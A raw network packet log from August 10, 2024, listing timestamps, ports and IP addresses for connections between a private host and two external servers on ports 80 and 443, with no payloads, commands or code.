Aug 10, 2024 16:12:25.309659958 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309659958 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309680939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309695005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309700012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309700012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309710026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309747934 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309762955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309771061 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309771061 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309777021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309792042 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309796095 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309796095 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309822083 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309834957 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309885025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309900045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309914112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309927940 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309942007 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309966087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309966087 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.309983969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.309998035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310012102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310031891 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310049057 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310061932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310076952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310085058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310085058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310085058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310085058 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310117960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310117960 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310302019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310316086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310329914 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310353041 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310401917 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310415983 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310416937 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310430050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310532093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310841084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310856104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310920954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310942888 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310955048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310955048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310955048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.310957909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.310972929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311026096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311026096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311052084 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311067104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311080933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311095953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311114073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311131001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311131001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311131001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311146975 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311152935 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311162949 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311178923 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311258078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311258078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311258078 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311537027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311551094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311564922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311585903 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311630964 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311635017 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311644077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311659098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311671972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311705112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311705112 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311718941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311800003 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311857939 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311863899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311878920 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311894894 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.311944008 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311944008 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.311944008 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.312041044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.312056065 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.312069893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.312082052 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.312102079 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.312103033 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.312149048 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.322487116 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.322499990 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.322674036 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.322685957 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.322782040 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.327034950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327049971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327064037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327111959 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.327361107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327374935 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327389956 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327404022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327419043 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.327455997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.327478886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.346333981 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346347094 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346457005 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346466064 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.346472025 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346617937 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.346617937 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.346623898 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346631050 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346695900 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.346699953 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346709967 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.346776962 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.347563028 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.347584963 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.347651958 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.347651958 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.347656012 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.347709894 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.348097086 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.348109007 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.348176956 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.348180056 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.348458052 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.349446058 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.349459887 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.349545002 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.349550009 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.349667072 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.350846052 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.350858927 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.350924969 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.350929022 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.351078033 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.365912914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.365933895 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.365948915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.365971088 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.365993023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366004944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366019964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366034985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366048098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366065025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366079092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366079092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366094112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366117001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366120100 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366132975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366136074 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366147995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366162062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366169930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366177082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366187096 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366189957 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366204977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366215944 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366231918 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366239071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366406918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366421938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366436005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366451025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366465092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.366480112 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.366507053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367163897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367177963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367192030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367208958 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367228031 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367230892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367243052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367258072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367273092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367305994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367305994 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367322922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367336035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367350101 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367363930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367377996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367398977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367480040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367494106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367508888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367522955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367522955 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367537975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367547989 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367562056 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367571115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367575884 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367590904 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367607117 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367609978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367620945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367638111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367647886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367674112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367676020 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367696047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367711067 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367723942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367738962 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367739916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367748976 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367753029 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367767096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.367774963 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.367799997 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.371984005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372000933 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372016907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372035980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372050047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372070074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372085094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372098923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372112989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372138023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372148037 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372148037 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372169971 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372184038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372184038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372199059 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372215033 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372239113 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372279882 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372293949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372308016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372318983 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372323990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372349024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372761965 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372776985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372790098 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372808933 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372821093 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372840881 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372854948 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372869015 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372884989 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.372894049 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372905970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.372926950 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377577066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377602100 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377615929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377624035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377650023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377727985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377742052 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377757072 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377770901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377770901 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377787113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377795935 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377810955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377820015 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377825022 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377840996 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377860069 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377873898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377883911 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377897024 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377897978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377911091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377923012 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377924919 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377935886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377948999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377950907 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377960920 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377962112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377975941 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.377979040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377993107 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.377991915 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378009081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378015995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378020048 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378030062 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378045082 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378057957 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378058910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378073931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378077984 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378103018 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378125906 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378139973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378154039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378165960 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378168106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378180027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378192902 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378195047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378217936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378236055 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378257036 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378271103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378283978 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378295898 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378298998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378307104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378314018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.378326893 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378335953 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.378351927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.398619890 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.398633957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.398648024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.398842096 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.398936987 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.398951054 CEST	80	49740	147.45.44.104	192.168.2.4
